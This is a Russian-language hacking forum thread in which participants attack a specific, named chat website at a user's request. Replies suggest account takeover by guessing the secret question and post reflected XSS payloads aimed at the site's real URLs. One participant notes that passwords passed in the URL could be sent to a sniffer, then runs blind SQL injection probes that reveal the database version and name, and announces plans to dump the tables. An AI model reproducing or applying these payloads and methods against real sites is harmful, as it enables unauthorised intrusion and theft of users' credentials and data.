Форум АНТИЧАТ - Помогите сломать чат

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)

- - Помогите сломать чат (https://forum.antichat.xyz/showthread.php?t=159111)

Помогите сломать чат

http://waufon.ru/serv/index.php?ci=427

Цитата:

Сообщение от Angel_Of_Trance

http://waufon.ru/serv/index.php?ci=427

пиши хостеру узнавай мыло
подбирай секретный вопрос и вауля готово

Ок. Сломал. Что дальше?

PHP код:


		
			
theSummaries[0] = "Бот> Привет ну наконецто ктото притопал..";

theSiteLinks[0] = "#";



theSummaries[1] = "Бот> Я научу Вас пользоватсо чатом если вы новичёк.";

theSiteLinks[1] = "#";



theSummaries[2] = "Бот> Если вы здесь впервые то надо Зарегистрироватсо.";

theSiteLinks[2] = "#";



theSummaries[3] = "Бот> Придумай сибе пароль и логин.";

theSiteLinks[3] = "#";



theSummaries[4] = "Бот> Выш пароль и логин здесь будет служить вам постоянным пропуском в ваш личный аккаунт.";

theSiteLinks[4] = "#";



theSummaries[5] = "Бот> Когда зайдёш в чатик то в Личном кабинете настрой его под свой носитель.";

theSiteLinks[5] = "#";



theSummaries[6] = "Бот> Количество сообщений,время обновления,Эмоцыи,Цвет сообщения,Выделения,и многие навороты";

theSiteLinks[6] = "#";



theSummaries[7] = "Бот> Я буду рад если вы качнёте свою фотку..";

theSiteLinks[7] = "#";



theSummaries[8] = "Бот> В анкете укажите свой Пол и год рождения,настрой и контакты свои.";

theSiteLinks[8] = "#";



theSummaries[9] = "Бот> У вас будет асортимент цветосхем в чате,У каждого сваё графити.";

theSiteLinks[9] = "#";



theSummaries[10] = "Бот> Смайлики найдёте в разделе Помощь";

theSiteLinks[10] = "#";



theSummaries[11] = "Бот> Админов ненадо доставать с просьбами дать должность.Я сам тут даю должностя.Набирайте посты и покупайте должностя.";

theSiteLinks[11] = "#";



theSummaries[12] = "Бот> Внимание! В чате есть магазин где продаютсо аваторы и разные фиговинки.";

theSiteLinks[12] = "#";



theSummaries[13] = "Бот> Прошу об одном.Ненагнетайте обстановку в чате.";

theSiteLinks[13] = "#";



theSummaries[14] = "Бот> Приводите друзей к нам мы будем вам признательны";

theSiteLinks[14] = "#";



theSummaries[15] = "Бот> Пока-пока...";

theSiteLinks[15] = "#";

У админа грамматика на высоте!

http://waufon.ru/serv/index.php?ci=427"><script>alert(document.cookie)</script>
А вот тут вкуснее
http://waufon.ru/serv/my/parole.php?ci=427&id=4589&pass=antichat&url="><scr ipt>alert()</script>
пасс хранится в поле pass можем смело отсылать на сниффер, токо для каждого юзверя нужен свой ID :(
P.S. А в куках он ничё не хранит
P.P.S. А мля он пасс через URL передаёт, ну тогда хз :o
P.P.P.S: Зарегал antichat:antichat

НЯ!
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=1--
http://waufon.ru/serv/galery.php?id=4589&pass=antichat&url=&ref=81339&ci =427+AND+1=2--
Версия 5.1.35-log

Цитата:

Сообщение от Ponchik

Ты мой кумир :(

Цитата:

Сообщение от Chack.

Ты мой кумир :(

Я хакер? :(
======
БД waufon_servak
пойду таблы таскать
И да, можно поискать не слепую скулю, но мне так интереснее :)

Цитата:

Сообщение от Ponchik

Я хакер? :(
======
БД waufon_servak
пойду таблы таскать
И да, можно поискать не слепую скулю, но мне так интереснее :)

Ты мой любимый пончик :(

Пончик, ты хакер. :(
Только ТСу надо было пасс админа, а потом похвастаться перед одноклассницами. =(